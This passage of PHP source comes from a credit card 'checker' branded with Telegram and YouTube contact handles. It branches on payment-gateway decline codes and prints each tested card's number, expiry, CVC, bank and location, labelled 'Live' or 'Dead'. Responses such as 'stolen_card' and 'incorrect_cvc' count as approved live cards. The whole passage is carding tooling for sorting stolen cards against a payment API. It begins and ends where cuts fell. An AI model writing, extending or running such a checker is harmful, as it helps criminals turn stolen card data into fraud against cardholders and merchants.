Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>
';
}
elseif (strpos($result, "stolen_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Stolen Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>
';
}
elseif (strpos($result, "Your card's security code is incorrect." )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Your card security code is incorrect </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_cvc" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Incorrect CVC </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "pickup_card" )) {
    echo '<span class="badge badge-success">#Aprovada </span></br> <span class="badge badge-success">♛</span> <span class="badge badge-success"> CC Details </span> <span class="badge badge-success">♛</span></br> <span class="badge badge-success">#Live CCN</span></br> <span class="badge badge-green">CC = '.$cc.'</span></br></b><span class="badge badge-green">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-green">CVC = '.$cvv.'</span></br><span class="badge badge-green">Code = Pickup Card </span></br><span class="badge badge-green">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"fraudulent")){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Fraudulent </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card has expired.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card has expired </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'security code is invalid.' )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Security Code is Invalid </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "expired_card" )) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Expired Card </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card number is incorrect.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your card number is incorrect </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "incorrect_number")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Incorrect Number </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "service_not_allowed")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Service Not Allowed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "do_not_honor")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Do Not Honor </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, "generic_decline")) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Generic Decline </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result, 'Your card was declined.')) {
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = Your Card was Declined </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unavailable"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unavailable </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "unchecked"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Unchecked </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,'"cvc_check": "fail"')){
    echo '<span class="badge badge-red">#Reprovada </span></br> <span class="badge badge-red">♛</span> <span class="badge badge-red"> CC Details </span> <span class="badge badge-red">♛</span></br> <span class="badge badge-red">#Dead Card</span></br> <span class="badge badge-red">CC = '.$cc.'</span></br></b><span class="badge badge-red">Exp = '.$mon.'/'.$year.'</span></br><span class="badge badge-red">CVC = '.$cvv.'</span></br><span class="badge badge-red">Code = CVC Check Failed </span></br><span class="badge badge-red">Time Taken = '.$time.'</span></br></br><span class="badge badge-blue">♛</span> <span class="badge badge-blue"> Cards Details </span> <span class="badge badge-blue">♛</span></br><span class="badge badge-blue">Bank = '.$bank.'</span></br><span class="badge badge-blue">Type = '.$type.'</span></br><span class="badge badge-blue">Scheme = '.$scheme.'</span></br><span class="badge badge-blue">Brand = '.$brand.'</span></br><span class="badge badge-blue">Currency = '.$currency.'</span></br><span class="badge badge-blue">Zipcode = '.$zip.'</span></br><span class="badge badge-blue">City = '.$city.'</span></br><span class="badge badge-blue">State = '.$state.'</span></br><span class="badge badge-blue">Country = '.$name.' '.$emoji.'</span></br></br><span class="badge badge-yellow">♛</span> <span class="badge badge-yellow"> Checker Details </span> <span class="badge badge-yellow">♛</span></br><span class="badge badge-yellow">Checker Made By = ♛ ★ BINS 💳💰 ★ ♛</span></br><span class="badge badge-yellow">Telegram Username = @hbins</span></br><span class="badge badge-yellow">Channel Link = @hbins</span></br><span class="badge badge-yellow">Group link = @hbinsfamily</span></br><span class="badge badge-yellow">Youtube Channel Link = https://www.youtube.com/channel/UC90dEuWW1FabrwvmeJJeZnQ</span></br></br><span class="badge badge-red">============================================================================================</span></br></br>';
}
elseif (strpos($result,"parameter_invalid_empty")){
